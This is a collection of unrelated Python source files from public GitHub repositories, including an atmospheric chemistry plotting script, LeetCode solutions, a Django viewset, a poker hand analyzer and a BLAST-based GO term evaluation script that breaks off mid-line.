\n\n","repo_name":"carsonmagnuson/Advent-of-Code","sub_path":"2022/15/fifteen.py","file_name":"fifteen.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"75007875983","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#SBATCH --job-name=timeseries\n#SBATCH --ntasks=1\n#SBATCH --mem=10gb\n#SBATCH --partition=interactive\n#SBATCH --time=00:10:00\n#SBATCH --output=LOGS/timeseries.log\nimport sys\nimport pandas as pd\nimport glob\nimport re\nimport datetime\nimport numpy as np\nfrom netCDF4 import Dataset\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport matplotlib\nmatplotlib.use('agg')\nsys.path.append('/users/mjr583/python_lib')\nimport GC_tools as GC\nimport RowPy as rp\nfrom CVAO_dict import CVAO_dict as d\nimport CVAO_tools as CV\nplt.style.use('seaborn-darkgrid')\n\n# Define a function to process time from \"minutes since T0 to datetime format \ndef GC_time_to_datetime(time):\n t0=fh.variables['time'].units\n t0=(int, re.findall(r'\\d+', t0))[1]\n t0=datetime.datetime(int(t0[0]), int(t0[1]), int(t0[2]), int(t0[3]), int(t0[4]), int(t0[5]) )\n times=[]\n for dt in time[:]:\n times.append( t0 + datetime.timedelta(minutes=dt) )\n times=np.array(times)\n return times\n\nvariables=['CO','O3','C2H6','NO2','NO']\nlabels=['Control','No BB','No African BB']\nbc = '/users/mjr583/scratch/GC/12.9.3/rundirs/irma_025x03125/GC_BC/'\nbc_nobb = '/users/mjr583/scratch/GC/12.9.3/rundirs/irma_025x03125_noBB/GC_BC/'\nbc_noaf = '/users/mjr583/scratch/GC/12.9.3/rundirs/irma_025x03125_noAfBB/GC_BC/'\n\nx = -24.9\ny = 16.9\nCO=[] ; times=[]\n\nfor var in variables:\n print(var)\n CO=[] ; times=[]\n for infile in sorted(glob.glob('%s*Boundary*201708*control.nc4' %bc)):\n print(infile)\n fh=Dataset(infile)\n co = fh.variables['SpeciesBC_%s' %var][:]*1e9\n CO.append(co)\n\n time=fh.variables['time']\n times.append( GC_time_to_datetime(time) ) \n\n lats=fh.variables['lat'][:]\n lons=fh.variables['lon'][:]\n lat_idx=rp.find_nearest(lats,y)\n lon_idx=rp.find_nearest(lons,x)\n print(lats[lat_idx])\n print(lons[lon_idx])\n\n CO=np.concatenate(CO)\n CO=CO[:,0,lat_idx, lon_idx]\n\n time=np.concatenate(times)\n\n df=pd.DataFrame({'BC_CO':CO}, index=time)\n\n CO=[] ; times=[]\n for infile in sorted(glob.glob('%s*Boundary*201708*NOBB.nc4' %bc_nobb)):\n print(infile)\n fh=Dataset(infile)\n co = fh.variables['SpeciesBC_%s' %var][:]*1e9\n CO.append(co)\n\n time=fh.variables['time']\n times.append( GC_time_to_datetime(time) ) \n CO=np.concatenate(CO)\n print(CO.shape)\n CO=CO[:,0,lat_idx, lon_idx]\n time=np.concatenate(times)\n nobb=pd.DataFrame({'BC_CO':CO}, index=time) \n\n CO=[] ; times=[]\n for infile in sorted(glob.glob('%s*Boundary*201708*noAfBB.nc4' %bc_noaf)):\n print(infile)\n fh=Dataset(infile)\n co = fh.variables['SpeciesBC_%s' %var][:]*1e9\n CO.append(co)\n\n time=fh.variables['time']\n times.append( GC_time_to_datetime(time) ) \n CO=np.concatenate(CO)\n print(CO.shape)\n CO=CO[:,0,lat_idx, lon_idx]\n time=np.concatenate(times)\n noaf=pd.DataFrame({'BC_CO':CO}, index=time)\n \n \n nobb=nobb.resample('D').mean()\n noaf=noaf.resample('D').mean()\n df=df.resample('D').mean()\n df=df['2017-08':'2017-09']\n\n\n plt.plot(df.index,df.BC_CO,label='Default boundary conditions')\n plt.plot(nobb.index,nobb.BC_CO, label='With no biomass burning')\n plt.plot(noaf.index,noaf.BC_CO, label='With no African biomass burning')\n\n plt.ylim(bottom=0)\n plt.legend()\n plt.savefig('plots/GC_BC_%s_at%sN%sW.png' %(var, str(lats[lat_idx]), str(lons[lon_idx]) ) )\n plt.close()\n","repo_name":"matt-rowlinson/GC_python_directories","sub_path":"interhemispheric_mixing/boundaryconds_timeseries.py","file_name":"boundaryconds_timeseries.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19002010598","text":"# Definition for singly-linked list with a random pointer.\n# class RandomListNode(object):\n# def __init__(self, x):\n# self.label = x\n# self.next = None\n# self.random = None\n\n\nclass Solution(object):\n def copyRandomList(self, head):\n \"\"\"\n :type head: RandomListNode\n :rtype: RandomListNode\n \"\"\"\n if head is None:\n return None\n\n # spawn new nodes following old nodes\n node = head\n while node is not None:\n n = node.next\n node.next = RandomListNode(node.label)\n node.next.next = n\n node = n\n\n # populate random pointer of new nodes\n node = head\n while node is not None:\n n = node.next.next\n if node.random is not None:\n node.next.random = node.random.next\n node = n\n\n out = head.next\n node = head\n while node is not None:\n n = node.next.next\n n2 = node.next\n node.next = n\n if n is not None:\n n2.next = n.next\n node = n\n\n return out\n","repo_name":"devilhtc/leetcode-solutions","sub_path":"0x008a_138.Copy_List_With_Random_Pointer/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"9567144948","text":"import os\nfrom edit_file_credit import TIIE_file_edit_from_py\nfrom getTIIE import TIIE_Actual\n\nclass insert_data():\n def __init__(self, path_file: str, sheet_name: str) -> None:\n \"\"\"\n params:\n path_file (str): path to excel document\n sheet_name (str): name of excel sheet to work and insert data\n \n description: \n initial the instantiate document excel, whit the sheet name, to allows insert the data from TIIE and save inteh same path file \n\n \"\"\"\n #del objeto de la TIIE solo obtenemos el dato actual\n TIIE = TIIE_Actual()[\"dato\"]\n\n #instanciamos el documento excel para trabajar con el y manipularlo\n client = TIIE_file_edit_from_py(path_file)\n\n #establecemos la hoja con la cual bamos a trabajar\n client.set_sheet_name(sheet_name)\n print(client.sheet_names)\n \"insert the tiie in the document excel file confirm to open the file and view the data en column with the name TIIE \"\n client.insert_value_in_client(TIIE)\n\n\nif __name__ == \"__main__\":\n path = \"./Control de crédito mensual .xlsx\"\n sheet_name = \"Alejandro Ochoa\"\n control_credito = insert_data(path_file=path,sheet_name=sheet_name)\n print(path)","repo_name":"Rigobertoj/process_automation","sub_path":"calculo_financiero/insert.py","file_name":"insert.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73089088141","text":"# coding: utf-8\n\nfrom rest_framework import status, mixins\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom .models import AnalysisLog\nfrom .serializer import AnalysisLogSerializer\n\n\n# PUT以外のメソッドを実装\nclass AnalysisLogViewSet(mixins.CreateModelMixin,\n mixins.RetrieveModelMixin,\n mixins.DestroyModelMixin,\n mixins.ListModelMixin,\n GenericViewSet):\n\n queryset = AnalysisLog.objects.all()\n serializer_class = AnalysisLogSerializer\n\n # POSTの場合は特別なレスポンスを返す\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n headers = self.get_success_headers(serializer.data)\n\n # 成功している場合は201で返す\n response_status = status.HTTP_201_CREATED if serializer.data['success'] == 'True' \\\n else status.HTTP_400_BAD_REQUEST\n\n return Response({'success': serializer.data['success'],\n 'message': serializer.data['message'],\n 'estimated_data':\n self.return_estimated_data(serializer.data['field_class'],\n serializer.data['confidence'])\n }, status=response_status, headers=headers)\n\n def return_estimated_data(self, field_class, confidence):\n if not field_class or not confidence:\n return {}\n\n return {'class': field_class, 'confidence': confidence}\n","repo_name":"amatsukixgithub/django_practice","sub_path":"analysislog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"15402736715","text":"\"\"\"\nWord Break II\nGiven a non-empty string s and a dictionary wordDict containing a list of non-empty words, add spaces in s to construct a sentence where each word is a valid dictionary word. Return all such possible sentences.\n\nNote:\n\nThe same word in the dictionary may be reused multiple times in the segmentation.\nYou may assume the dictionary does not contain duplicate words.\nExample 1:\n\nInput:\ns = \"catsanddog\"\nwordDict = [\"cat\", \"cats\", \"and\", \"sand\", \"dog\"]\nOutput:\n[\n \"cats and dog\",\n \"cat sand dog\"\n]\nExample 2:\n\nInput:\ns = \"pineapplepenapple\"\nwordDict = [\"apple\", \"pen\", \"applepen\", \"pine\", \"pineapple\"]\nOutput:\n[\n \"pine apple pen apple\",\n \"pineapple pen apple\",\n \"pine applepen apple\"\n]\nExplanation: Note that you are allowed to reuse a dictionary word.\nExample 3:\n\nInput:\ns = \"catsandog\"\nwordDict = [\"cats\", \"dog\", \"sand\", \"and\", \"cat\"]\nOutput:\n[]\n\"\"\"\n\n\"\"\"\nDFS\n\n1.Every time, we check whether s starts with a word. If so, we check whether the substring s[len(word):] starts with a word, etc.\n2.resultOfTheRest keeps calling until we hit the last word. If the last word is in the dict, we append it to res.\nThe last word is 'dog ==> 'res = [ \"dog\"]\n3. This time, we skip \"else,\" since we fulfill the condition \" if len(word) == len(s).\" We store it in memo: {'dog': ['dog']}\n\n4.Then we return to \"resultOfTheRest = self.helper(s[len(word):], wordDict, memo)\"\ns = \"sanddog\" because we start with \"cat\" (cat is the first word in the dict) and \"cat\" leads to \"sand\".\nresultOfTheRest = [\"dog\"]\nword = \"sand\"\nitem = \"sand dog\"\nres = [\"sand dog\"]\nmemo ={'dog': ['dog'], \"sanddog\":[\"sand dog\"] }\n\nWhy do we need memo?\nWe always recurse to the last word in the string and backtrack, so storing all possible combinations of the substring in the memo saves time for the next iteration of the whole string. For example, \"catsanddog,\" if we don't store \"dog,\" then we have to iterate through the dictionary. This is very DP.\n\nTime: O(n^3) size of recursion is n^2 and we go through n results\nSpace: O(n^3)\n\"\"\"\nclass Solution:\n def wordBreak(self, s: str, wordDict: List[str]) -> List[str]:\n \n def dfs(s, wordDict, memo):\n if s in memo:\n return memo[s]\n if not s:\n return []\n res = []\n for word in wordDict:\n if not s.startswith(word):\n continue\n if len(word) == len(s):\n res.append(word)\n else:\n remains = dfs(s[len(word):], wordDict, memo)\n for remain in remains:\n remain = '{} {}'.format(word, remain)\n res.append(remain)\n memo[s] = res\n return memo[s]\n \n memo = dict()\n return dfs(s, wordDict, memo)\n\n","repo_name":"Bennyhwanggggg/Algorithm-and-Data-Structures-and-Coding-Challenges","sub_path":"Challenges/wordBreakII.py","file_name":"wordBreakII.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"18542012440","text":"# Q1\r\nprint(\"To convert a given temperature from deg C to deg F\")\r\na = 40 # degree celsius\r\nb = a*1.8 + 32\r\nprint(a, \" degree celsius converted to \", b, \"Fahrenheit\")\r\n\r\n\r\n# Q2\r\n\r\nprint(\"To check if number m is divisible by number n\")\r\nm = int(input(\"Number m : \"))\r\nn = int(input(\"Number n : \"))\r\nif m % n == 0 :\r\n print(m, \"is divisible by \", n)\r\nelse:\r\n print(m, \"is not divisible by \", n)\r\n\r\n\r\n# Q3\r\nprint(\"To check whether given integer is odd or even\")\r\nc = int(input(\"Enter an integer : \"))\r\nif c % 2 == 0 :\r\n print(c, \"is even\")\r\nelse:\r\n print(c, \"is odd\")\r\n\r\n\r\n# Q4\r\nprint(\"To create a user defined function to obtain sum of first n natural number \")\r\nnum1 = int(input(\"Enter number up to which we want sum \"))\r\ni = 1\r\nsum1 = 0\r\nwhile i <= num1:\r\n sum1 = sum1 + i\r\n i = i + 1\r\nprint(\"Sum of first n numbers is\", sum1)\r\n\r\nprint(\"To create a user defined function to obtain sum of square of first n natural number\")\r\nnum2 = int(input(\"Enter number up to which we want sum \"))\r\nj = 1\r\nsum2 = 0\r\nwhile j <= num2:\r\n sum2 = sum2 + (j*j)\r\n j = j+1\r\nprint(\"sum of square of first n natural number is\", sum2)\r\n\r\n\r\n# Q5\r\nprint(\"To obtain sum of first n odd numbers\")\r\nlimit = int(input(\"Enter limit \"))\r\nk = 1\r\nsum3 = 0\r\nwhile k <= limit:\r\n sum3 = sum3 + k\r\n k = k+2\r\nprint(\"Sum of n odd no. is\", sum3)\r\n\r\n\r\n# Q6\r\nprint(\"To obtain sum of first n even numbers\")\r\n\r\nn = int(input(\"How many even no.s you want to add \"))\r\nl = 1\r\nsum4 = 0\r\ncount = 1\r\nwhile count <= n:\r\n if (l%2 == 0):\r\n sum4 = sum4 + l\r\n count = count + 1\r\n l = l+1\r\nprint(\"Sum of even no.s=\", sum4)\r\n\r\n\r\n# Q7\r\nprint(\"To find and print the A-B and B-A of two sets A and B\")\r\ndef A_B(A, B):\r\n A_minus_B = A - B\r\n B_minus_A = B - A\r\n print(\"Set A minus Set B (A-B) is :\", A_minus_B)\r\n print(\"Set B minus Set A (B-A) is :\", B_minus_A)\r\n\r\n\r\nA = {\"a\", \"b\", \"c\", \"d\"} # Given\r\nB = {\"b\", \"c\", \"e\"} # Given\r\nA_B(A, B)\r\n\r\n\r\n# Q8\r\nprint(\"To calculate and print sum and sum of square of given numbers: 20, 12, 15, 1, 7, 10, 5, 1, 15, 5\")\r\nx = [20, 12, 15, 1, 7, 10, 5, 1, 15, 5]\r\ny = 1\r\nsum5, sum6 = 0, 0\r\nwhile y <= x:\r\n sum5 = sum5 + y\r\n sum6 = sum6 + (y*y)\r\n y = y + 1\r\nprint(\"Sum of given numbers is\", sum5)\r\nprint(\"sum of square of first n natural number is\", sum6)","repo_name":"AMANOZAKO/Basics-of-Python_SPC","sub_path":"9111 Assignment 3 Ishita Namdeo.py","file_name":"9111 Assignment 3 Ishita Namdeo.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24872510492","text":"#! /usr/bin/env python\n\"\"\"\nTakes a directory of extractions json and writes to two output directories:\nplaintext paragraph dumps and one sentence tokenized per line.\nSkips empty_output.txt files and filtered by language id dir.\n\"\"\"\nimport json\nimport os\nfrom argparse import ArgumentParser\n\nfrom extraction.document import Document\n\n\ndef plaintextify():\n parser = ArgumentParser(description=__doc__)\n parser.add_argument(\"inputdir\", help=\"Input directory\")\n parser.add_argument(\"outputdir\", help=\"Output directory\")\n parser.add_argument(\"--section\", help=\"Filter articles of a certain section\")\n parser.add_argument(\"--keyword\", help=\"Filter articles of a certain section\")\n parser.add_argument(\"--raw-only\", action=\"store_true\")\n parser.add_argument(\"--tokenized-only\", action=\"store_true\")\n args = parser.parse_args()\n\n raw_outdir = os.path.join(args.outputdir, \"raw_paragraphs\")\n sents_outdir = os.path.join(args.outputdir, \"tokenized_sentences\")\n\n # Walk the input dir\n for subdir in os.listdir(args.inputdir):\n\n # Completely skip the filtered directory\n if subdir == \"lang_id_filtered\":\n continue\n\n insubdir = os.path.join(args.inputdir, subdir)\n # Skip non-directories, like .DS_Store files\n if not os.path.isdir(insubdir):\n continue\n\n raw_sub = os.path.join(raw_outdir, subdir)\n sents_sub = os.path.join(sents_outdir, subdir)\n if not args.tokenized_only:\n os.makedirs(raw_sub, exist_ok=True)\n if not args.raw_only:\n os.makedirs(sents_sub, exist_ok=True)\n files = os.listdir(insubdir)\n for f in files:\n # This ignores empty_output.txt, which is just a list of urls where we didn't\n # extract anything, but it also covers OS files like .DS_Store\n if not f.endswith(\".json\"):\n continue\n filepath = os.path.join(insubdir, f)\n with open(filepath, \"r\", encoding=\"utf8\") as infile:\n json_dict = json.load(infile)\n doc = Document.from_dict(json_dict)\n # Skip document if filtering by section\n if args.section and args.section != doc.section:\n continue\n if args.keyword and args.keyword not in doc.keywords:\n continue\n filename = doc.filename.replace(\".html\", \"\") + \".txt\"\n raw_path = os.path.join(raw_sub, filename)\n sents_path = os.path.join(sents_sub, filename)\n if not args.tokenized_only:\n with open(raw_path, \"w\", encoding=\"utf8\") as raw_out:\n raw_out.write(\"\\n\\n\".join([doc.title] + doc.paragraphs))\n if not args.raw_only:\n with open(sents_path, \"w\", encoding=\"utf8\") as sents_out:\n sents_out.write(doc.title + \"\\n\\n\")\n sents_out.write(\n \"\\n\\n\".join(\n [\n \"\\n\".join([\" \".join(sent) for sent in paragraph])\n for paragraph in doc.tokens\n ]\n )\n )\n\n\nif __name__ == \"__main__\":\n plaintextify()\n","repo_name":"bltlab/mot","sub_path":"extraction/plaintextify.py","file_name":"plaintextify.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"47"} +{"seq_id":"16038017870","text":"import sys\nimport cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n# python templateMatchingTest.py path_to_frame.jpg path_to_object_template.jpg\n\nframe = sys.argv[1]\nobjeto = sys.argv[2]\n\nimg = cv.imread(frame, 0)\nimg2 = img.copy()\ntemplate = cv.imread(objeto, 0)\nimgWidth, imgHeight = template.shape[::-1]\n\nmethods = ['cv.TM_CCOEFF', 'cv.TM_CCOEFF_NORMED', 'cv.TM_CCORR',\n 'cv.TM_CCORR_NORMED', 'cv.TM_SQDIFF', 'cv.TM_SQDIFF_NORMED']\n\nprint(\"Métodos:\")\nfor i, method in enumerate(methods):\n print(f\"{i + 1}. {method}\")\nindiceMetodoSelecionado = int(\n input(\"Qual método quer usar: \")) - 1\n\nmetodoSelecionado = methods[indiceMetodoSelecionado]\n\nimg = img2.copy()\nmethod = eval(metodoSelecionado)\nres = cv.matchTemplate(img, template, method)\n_, _, minLoc, maxLoc = cv.minMaxLoc(res)\n\nif method in [cv.TM_SQDIFF, cv.TM_SQDIFF_NORMED]:\n topLeft = minLoc\nelse:\n topLeft = maxLoc\n\nbottomRight = (topLeft[0] + imgWidth, topLeft[1] + imgHeight)\n\ncv.rectangle(img, topLeft, bottomRight, 255, 2)\n\nplt.subplot(122)\nplt.imshow(img, cmap='gray')\nplt.title('')\nplt.xticks([])\nplt.yticks([])\n\nplt.subplot(121)\nplt.imshow(res, cmap='gray')\nplt.title(metodoSelecionado)\nplt.xticks([])\nplt.yticks([])\n\nprint(f'Método: {metodoSelecionado}\\nMin: {minLoc}\\nMax: {maxLoc}\\n')\n\nplt.show()\n","repo_name":"victorrequia/UDESC","sub_path":"PIM - Processamento de Imagens/Listas de Exercícios/Tarefa Final/Source/C/templateMatch.py","file_name":"templateMatch.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"28419574020","text":"class Solution:\n def solve(self, weights, limit):\n # Write your code here\n weights.sort()\n i,j = 0, len(weights) -1\n ans = 0\n while i <= j:\n if weights[i] + weights[j] <= limit:\n i+=1\n j-=1\n ans +=1\n return ans","repo_name":"Alferdize/Data-Structure-and-Algorithms","sub_path":"Algorithms/binary_search.com/rocketship_rescue.py","file_name":"rocketship_rescue.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30850158554","text":"import random\nimport sys\n\nclass Card:\n def __init__(self, face, suite):\n if face < 11:\n if face == 10:\n self.face = face\n else:\n self.face = ' ' + str(face)\n if face == 11:\n self.face = ' J'\n if face == 12:\n self.face = ' Q'\n if face == 13:\n self.face = ' K'\n if face == 14:\n self.face = ' A'\n if suite == 1:\n self.suite = 'D'\n if suite == 2:\n self.suite = 'C'\n if suite == 3:\n self.suite = 'H'\n if suite == 4:\n self.suite = 'S'\n self.face_int = face\n self.suite_int = suite\n\nclass Poker_Table:\n def __init__(self):\n self.hands = []\n self.deck = []\n self.duplicate = None\n for x in range (1,5):\n for y in range(2,15):\n self.deck.append(Card(y,x))\n random.shuffle(self.deck)\n def input_hands(self):\n with open(sys.argv[1], 'r') as my_file:\n lines = my_file.readlines()\n for line in lines:\n self.hands.append(Hand())\n line = line.strip()\n cards = line.split(\",\")\n for card in cards:\n str = card.replace(\" \", \"\")\n new_card = self.input_card(str[-2],str[-1])\n self.hands[-1].deal(new_card)\n found = False\n for search_card in self.deck:\n if search_card.face_int == new_card.face_int and search_card.suite_int == new_card.suite_int:\n self.deck.pop(self.deck.index(search_card))\n found = True\n if not found:\n if not self.duplicate:\n self.duplicate = Hand()\n self.duplicate.deal(new_card)\n else:\n duplicated = False\n for card in self.duplicate.hand:\n if card.face_int == new_card.face_int and card.suite_int == new_card.suite_int:\n duplicated = True\n if not duplicated:\n self.duplicate.deal(new_card)\n def input_card(self, face, suite):\n if face == \"A\":\n face_int = 14\n elif face == \"K\":\n face_int = 13\n elif face == \"Q\":\n face_int = 12\n elif face == \"J\":\n face_int = 11\n elif face == \"0\":\n face_int = 10\n else:\n face_int = int(face)\n if suite == 'D':\n suite_int = 1\n elif suite == 'C':\n suite_int = 2\n elif suite == 'H':\n suite_int = 3\n else:\n suite_int = 4\n return Card(face_int, suite_int)\n def deal(self):\n for x in range(0,5):\n for y in range(0,6):\n if x == 0:\n self.hands.append(Hand())\n self.hands[y].deal(self.deck[0])\n self.deck.pop(0)\n def print_deck(self, col = 52):\n for x in range(0,len(self.deck)):\n print(self.deck[x].face, self.deck[x].suite, sep='', end=' ')\n if x % col == col - 1:\n print()\n print('\\n')\n def print_hands(self):\n for hand in self.hands:\n for card in hand.hand:\n print(card.face, card.suite, sep='', end=' ')\n if not hand.value == 0:\n print(\"---\", hand.value_str, end='')\n print()\n print('\\n')\n def rank_hands(self):\n for hand in self.hands:\n sorted_hand = hand.sort()\n temp = []\n flush = 0\n straight = True\n prev_card_int = None\n for x in range(0,5):\n if flush != 0 and flush != 5:\n if sorted_hand[x].suite_int != flush:\n flush = 5\n elif flush == 0:\n flush = sorted_hand[x].suite_int\n\n if prev_card_int == None:\n prev_card_int = sorted_hand[x].face_int\n elif straight:\n if prev_card_int + 1 == sorted_hand[x].face_int or (prev_card_int == 5 and sorted_hand[x].face_int == 14):\n if prev_card_int == 5 and sorted_hand[x].face_int == 14:\n hand.low_ace = True\n if not x == 4:\n prev_card_int = sorted_hand[x].face_int\n else:\n straight = False\n \n if len(temp) == 0:\n temp.append([])\n temp[0].append(sorted_hand[x])\n else:\n inserted = False\n for y in temp:\n if y[0].face_int == sorted_hand[x].face_int:\n y.append(sorted_hand[x])\n inserted = True\n if not inserted:\n temp.append([])\n temp[len(temp)-1].append(sorted_hand[x])\n hand.sorted = temp\n if len(temp) == 2:\n if len(temp[0]) == 1 or len(temp[0]) == 4:\n hand.value = 3\n hand.value_str = \"Four of a Kind\"\n else:\n hand.value = 4\n hand.value_str = \"Full House\"\n elif len(temp) == 3:\n if len(temp[0]) == 3 or len(temp[1]) == 3 or len(temp[2]) == 3:\n hand.value = 7\n hand.value_str = \"Three of a Kind\"\n else:\n hand.value = 8\n hand.value_str = \"Two Pair\"\n elif len(temp) == 4:\n hand.value = 9\n hand.value_str = \"Pair\"\n if flush != 5 and straight:\n if hand.low_ace and prev_card_int == 5:\n hand.value = 2\n hand.value_str = \"Straight Flush\"\n else:\n hand.value = 1\n hand.value_str = \"Royal Straight Flush\"\n elif flush != 5:\n hand.value = 5\n hand.value_str = \"Flush\"\n elif straight:\n hand.value = 6\n hand.value_str = \"Straight\"\n if hand.value == 0:\n hand.value = 10\n hand.value_str = \"High Card\"\n def order_hands(self):\n sorted_hands = []\n for hand in self.hands:\n sorted_hands.append(hand)\n n = len(sorted_hands)\n swapped = False\n for i in range(n-1):\n for j in range(0, n-i-1):\n if sorted_hands[j].value > sorted_hands[j + 1].value:\n swapped = True\n sorted_hands[j], sorted_hands[j + 1] = sorted_hands[j + 1], sorted_hands[j]\n elif sorted_hands[j].value == sorted_hands[j + 1].value:\n if self.tiebreak(sorted_hands[j], sorted_hands[j + 1]):\n swapped = True\n sorted_hands[j], sorted_hands[j + 1] = sorted_hands[j + 1], sorted_hands[j]\n if not swapped:\n self.hands = sorted_hands\n self.hands = sorted_hands\n def tiebreak(self, hand_1, hand_2):\n if hand_1.groups == None:\n hand_1.group()\n if hand_2.groups == None:\n hand_2.group()\n \n temp_1 = hand_1.groups.copy()\n temp_2 = hand_2.groups.copy()\n \n return self.tiebreak_recursive(temp_1,temp_2,hand_1,hand_2)\n def tiebreak_recursive(self, hand_1, hand_2, ref_1, ref_2):\n if hand_1[-1][-1][-1].face_int < hand_2[-1][-1][-1].face_int:\n return True\n elif hand_1[-1][-1][-1].face_int == hand_2[-1][-1][-1].face_int:\n if not len(hand_1[-1][0]) == 1:\n if len(hand_1[-1]) == 1:\n hand_1.pop(len(hand_1) - 1)\n hand_2.pop(len(hand_1) - 1)\n else:\n hand_1[len(hand_1) - 1].pop(len(hand_1[len(hand_1) - 1]) - 1)\n hand_2[len(hand_1) - 1].pop(len(hand_1[len(hand_1) - 1]) - 1)\n return self.tiebreak_recursive(hand_1,hand_2,ref_1,ref_2)\n else:\n if not (ref_1.low_ace and ref_2.low_ace):\n if hand_1[-1][-1][-1].suite_int < hand_2[-1][-1][-1].suite_int:\n return True\n else:\n if hand_1[-1][-2][-1].suite_int < hand_2[-1][-2][-1].suite_int:\n return True\n return False\n \nclass Hand:\n def __init__(self):\n self.hand = []\n self.value = 0\n self.value_str = None\n self.sorted = None\n self.groups = None\n self.low_ace = False\n def deal(self, card):\n self.hand.append(card)\n def sort(self):\n sorted_hand = []\n for card in self.hand:\n sorted_hand.append(card)\n n = len(sorted_hand)\n swapped = False\n for i in range(n-1):\n for j in range(0, n-i-1):\n if sorted_hand[j].face_int > sorted_hand[j + 1].face_int:\n swapped = True\n sorted_hand[j], sorted_hand[j + 1] = sorted_hand[j + 1], sorted_hand[j]\n elif sorted_hand[j].face_int == sorted_hand[j + 1].face_int:\n if sorted_hand[j].suite_int > sorted_hand[j + 1].suite_int:\n swapped = True\n sorted_hand[j], sorted_hand[j + 1] = sorted_hand[j + 1], sorted_hand[j]\n if not swapped:\n return sorted_hand\n return sorted_hand\n def group(self):\n temp = []\n if len(self.sorted) == 5:\n temp.append([])\n for card in self.sorted:\n temp[0].append(card)\n else:\n temp.append([])\n temp.append([])\n low = 2;\n for card in self.sorted:\n if len(card) < low:\n low = len(card)\n if low == 1:\n for card in self.sorted:\n if len(card) == 1:\n temp[0].append(card)\n else:\n temp[1].append(card)\n else:\n for card in self.sorted:\n if len(card) == 2:\n temp[0].append(card)\n else:\n temp[1].append(card)\n self.groups = temp\n \ntable = Poker_Table()\nprint(\"*** P O K E R H A N D A N A L Y Z E R ***\")\nif len(sys.argv) == 2:\n print(\"*** USING TEST DECK OF CARDS ***\")\n table.input_hands()\nelse:\n print(\"*** USING RANDOMIZED DECK OF CARDS ***\")\n print(\"*** Shuffled 52 card deck:\")\n table.print_deck(13)\n table.deal()\nprint(\"*** Here are the six hands...\")\ntable.print_hands()\nif not table.duplicate:\n print(\"*** Here is what remains in the deck...\")\n table.print_deck()\n print(\"--- WINNING HAND ORDER ---\")\n table.rank_hands()\n table.order_hands()\n table.print_hands()\nelse:\n print(\"*** ERROR - DUPLICATED CARD(S) FOUND IN DECK ***\")\n print(\"*** DUPLICATE(S): \", sep=\"\", end=\"\")\n duplicates = table.duplicate.sort()\n for card in duplicates:\n print(card.face,card.suite, sep=\"\", end=\" \")\n print(\" ***\")\n","repo_name":"charbygill/Five-Card-Stud","sub_path":"FiveCardStud.py","file_name":"FiveCardStud.py","file_ext":"py","file_size_in_byte":11535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24611706919","text":"import pickle, os, sys, gzip, re\nimport pandas as pd\nimport numpy as np\nfrom tqdm import tqdm\n\nimport gensim\nfrom gensim.models import KeyedVectors\n\nsys.path.append (\"/u/flashscratch/d/datduong/GOmultitask/\")\nimport ProtSeq2GO.evaluation_metric as evaluation_metric\n\nimport blastp.ExpandGOSet as ExpandGOSet\n\n## can be sloppy , don't need a whole arg input.\n\ndef submitJobs (main_dir, data_dir, blast_result_dir, what_set, ontology_type, wordvec_file,wordvec_file_small,label_subset_file) :\n\n ## @blast_result_dir is where we output the blast score, this is not same as @data_dir... should change pipeline ? \n\n if wordvec_file_small == \"none\": \n ExpandGOSetOnBlast = ExpandGOSet.GOVector(wordvec_file,label_subset_file)\n else: \n ExpandGOSetOnBlast = ExpandGOSet.GOVector(wordvec_file,label_subset_file,wordvec_file_small=wordvec_file_small,cut_point=0.95)\n\n BlastResult = pickle.load ( open(blast_result_dir+what_set+\"-\"+ontology_type+\".dict.pickle\",\"rb\") )\n\n print ('number of prot with prediction from blast-style {}'.format(len(BlastResult))) \n \n BlastResultExpand = ExpandGOSetOnBlast.ExpandBlast(BlastResult)\n\n pickle.dump ( BlastResultExpand, open(blast_result_dir+what_set+\"-\"+ontology_type+\".expand.pickle\",\"wb\") )\n\n df = pd.read_csv(data_dir+what_set+\"-\"+ontology_type+\".tsv\",sep=\"\\t\")\n prot_array = list(df['Entry']) ## only need name to retain the same ordering\n prediction = ExpandGOSetOnBlast.dict2matrix(BlastResultExpand,prot_array)\n print (prediction)\n\n ## get true label\n true_label = pickle.load ( open(data_dir+what_set+\"-\"+ontology_type+\".TrueLabel.pickle\",\"rb\") )\n print ('number of prot in test set {}'.format(len(true_label)))\n true_label = ExpandGOSetOnBlast.truelabel2matrix(true_label,prot_array)\n print (true_label)\n\n print ('remove prot that blast did not find')\n get_found = np.where ( np.sum(prediction,1) > 0 ) [ 0 ]\n prediction = prediction[get_found,:]\n true_label = true_label[get_found,:]\n\n metric = evaluation_metric.all_metrics ( np.round(prediction), true_label, 